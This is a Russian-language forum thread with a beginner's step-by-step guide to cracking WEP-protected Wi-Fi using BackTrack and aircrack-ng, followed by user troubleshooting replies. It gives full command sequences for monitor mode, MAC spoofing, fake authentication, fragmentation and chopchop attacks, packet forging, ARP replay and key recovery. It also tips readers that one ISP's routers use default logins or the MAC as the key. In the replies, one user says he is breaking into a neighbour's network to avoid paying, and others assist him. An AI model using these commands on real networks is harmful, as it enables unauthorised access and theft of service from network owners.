9 шагов или BT5, взлом wep для начинающих!

Статейку накатал с опыта много чего не указал примеров нету и не нада - выложу видео ето будет проще
используем БТ4 , статья для тех кто не знает что такое линукс и ниразу с ним не работал не бойтесь
пытаться юзать линукс все очень просто я уверен что у вас получиться , все остальные вопросы можна найти на форуме
я уверен что там есть ответы.

1) airmon-ng start wifi0 Запускаем карту ( wlan0 -ето интерфейс он у каждого компа разный в даном случае wlan0)
еще бывают ath0 mon0 итп.
2) airodump-ng wlan0 Запускаем мониторинг список сетей, выбираем мак сети и канал который будем ломать
определиться с выбором можна просто смотрим какой сигнал сильнее логично , ето дело можна записывать но я
просто командой выдиляем ето окно и жмем Ctrl+c - останавливает процес мониторинга , после выбора канала
останавливаем все окна командой Ctrl+c и делаем такое
airmon-ng stop mon0
airmon-ng stop wlan0 (внимание ето мой интерфейс у вас он может быть другим я выше писал)
airmon-ng start wlan0 и канал сети которую будем ломать выглядит ето так
airmon-ng start wlan0 9 - пример.


3) macchanger wlan0 смотрим свой мак адрес, визде по разному работает если у вас их 2 то первый ваш.
В линуксе есть по стандарту 2 десктопа первые три выше указаных команды проделываем в одном десктопе
а все остальное открываем 2 десктоп и проделываем все остальное ниже указаное ето для вашего удобства.

4) airodump-ng -c канал сети --bssid мак сети которую ломаем -w capture wlan0 запускаем монитор сети
в етом окне будет мак ломаемой сети. И будут собираться пакеты.

Пятая команда выполняеться в одном окне если все прошло нормально после пыполнения команд вы увидите
англ текст и вот такое вот
5) 1. aireplay-ng -1 0 -e (название сети которую ломаем) -a (мак сети которую ломаем) -h (ваш мак) wlan0
2. aireplay-ng -1 6000 -o 1 -q 10 -e (имя сети) -a (mac каторый ломаем) -h (ваш мак) wlan0

6) aireplay-ng -5 -b (мак который ломаем) -h (ваш мак) wlan0 атака отдельное окно будет задавать вопрос
жмем y
7) aireplay-ng -4 -h (ваш мак) -b (мак который ломаем) wlan0 атака отдельное окно будет задавать вопрос
жмем y


Если атака удалась то вы увидите файл .xor - его нада прописать ниже в первой команде
8) 1. packetforge-ng -0 -a мак сети -h твой мак -k 255.255.255.255 -l 255.255.255.255 -y .xor -w arp-request появится окно и вписываем команду 2.
2. aireplay-ng -2 -r arp-request wlan0
Команда 8 набираем в одном окне
Ну вот и конец всему при наборе етой команды програма начнет переберать собраные пакеты их нада от 20 000
до 2000000 восновном весь процес в среднем занимает 15- 60 минут ,
если у вас не удалось запустить -4 -5 и -1 не растраивайтесь продолжайте собирать пакеты они форматом .cap
сохраняються на ваш рабочий стол..
9) aircrack-ng -b ломаемый мак capture*.cap

Если пишет что KEY FOUND! - вы нашли пароль ... если в пароле будут все нули ето не верный пароль, продолжайте
собирать пакеты до тех пор пока не найдете пароль ... взлом только шифрование wep

Я думаю у вас получиться ...
БТ4 качаем с оф сайта большая скорость пол часа и скачали бесплатно.
Более конкретно обсосать aircrack и airdump можна у Elvis000 на ветке
.....................................................................................
Что б не флудить решил сюда добавить по теме у кого провайдер PTv недавно просек тему у них у всех стоит wep 64 битный , пароль можна узнать очень просто 1. вариант admin логин и пароль 2. вариант МАК адрес ето и есть пароль только пропустите первые две цыфры а все остальное ето пароль , 5 точек проверил все работает ! ...
видео взлом WPA ВЗЛОМ WPA2<<<<<<<<<ВКЛ

Статистика скорости перебора пароля :

 

bt4 предфинальная версия:

Шаг 1 останавливаем wi-fi карту: ifconfig wlan0 down
шаг 2 меняем мак: macchanger --mac 00:11:11:11:11:11 wlan0
шаг 3 подымаем wi-fi карту: ifconfig wlan0 up
шаг 3 включаем wi-fi карту в режим мониторинга: airmon-ng start wlan0 "получаем виртуальный интерфейс mon0"
шаг 4 запускаем программу сканирования wi-fi сетей: airodump-ng mon0
шаг 5;6:7 и тд. читаем тему от Elvis000 "Документация по airodump-ng, aircrack-ng." там всё популярно написано.

 

фак писал что б пасажири которые не умеют летать на линукс не писали в пм а сразу ломали сеть . зачем флудить в теме ?

 

Я тебя засужу за обман.. на моем Зюкселе 56К не скачалось за пол часа (стеб)

этой статьей ты только сильнее превлек внимание к своему ПМ, да и те кто "не умеют летать на линукс" даже с этой статейкой не полетят.

Это не флуд а открытое мнение о том что ты, как таковое выложил перевод офф. доков (просто сжато и на родимом, могучем. за что и маленький респектик тебе).

извини конечно но твоя статья никак не может быть руководством для начинающих пользоваться ОС Linux и д.р. Unix подобных.

Спасибо за внимание, оформление статьи не сахар =(

 

POS_troi


я видео выложу тады в ПМ писать не будут

 

На пятом пункте постоянно:

Sending Authentication Request (Open System)
Attack was unsuccessful. Possible reasons:

* Perhaps MAC address filtering is enabled.
* Check that the BSSID (-a option) is correct.
* Try to change the number of packets (-o option).
* The driver/card doesn't support injection.
* This attack sometimes fails against some APs.
* The card is not on the same channel as the AP.
* You're too far from the AP. Get closer, or lower
the transmit rate.

------------
все сломать эту точку уже не удастся, верно?

 

LuCiFeR если это wep то получить пороль можно.
У вас может не хватает мощности вашей wi-fi карты или на AP стоит фильтрация по MAC, ещё попробуйте пройти Authentication когда на AP появится клиент.

 

LuCiFeR у тя чипсет не centrino случайно ? если да то просто собирай пакеты , на 25000 можешь пробовать крякать если мало собирай до тех пор пока не напишет что пароль найден

 

У меня Асус М50Vc. я склоняюсь к тому варианту что сигнал слабоват.
Вообще я занимаюсь этим впервые, до этого никсы вообще не трогал. Но обстоятельства сложились так, что в этом месяце я не могу заплатить за свой инет, по этому ищу альтернативу в соседском вай фае)))



Кто нить тут видит приличную точку? )))

 

LuCiFeR

самая первая самая нижняя и кствати одна открытая )

 

Ищи где шифрования WEP, и снифай ломай))
а WPA брутить надо=)

 

я то полетел -)....

 

6) aireplay-ng -5 -b (мак который ломаем) -h (ваш мак) wlan0 атака отдельное окно будет задавать вопрос
жмем y

вот так правильней по моему ><


-----------

не понимаю я, пробовал уже 4 wep защищенных точки, ни разу не удалось... хотя сигнал больше половины... может у меня карточка не подходящая?

 

ага .. очепятка . исправил!
если карта не подходит то просто собирай пакеты , да оно б писало что вас чипсет не подходит на англ... у тя не сентрино чипсет случйно если нет то не беспокойся )

 

atheros

 

Застрял на третем пункте
ввожу sudo macchanger wlan0
Current MAC: 00:11:11:11:11:11 (Intel Corporation)
ERROR: Can't change MAC: interface up or not permission: Device or resource busy

с чем это связано?

 

Robert007, ifconfig wlan0 down
Читай код ошибки, устройство занято, следовательно его нужны остановить...

Вопрос к затокам, я пробовал 10 разновидностей атак, при сигнале 100% на 10 разных точках, ни разу не смог добится хотяб какого нить результата... У меня убунту 9.10 с пакетом аиркрака... быть может у меня драйвер не подходит? Чипсес atheros, дрова стандартные с пакета убунту. Подскажите что делать. Модель ноутбука Asus M50Vc

 

Всё чделал как написано
Пункт 4,6,7 без проблем
Идёт мониторинг и два окна читают пакеты (вроде всё нормально 9000 и 7000 пакетов)

оно само законить читать или нужно выключить в ручную?
на рабочем столе никаких файлов не появилось,они появяться потом?
в мониторинге в #Data стоит значение 6 и не поднимаеться,это нормально?

 

ни с чем просто мак адрес копируй и делай все дальше .... -)

 

дата ето вектора ивы пакеты которые ломаються их нада собирать если молчит то нада ждать пока подымиться хотя б до 25 000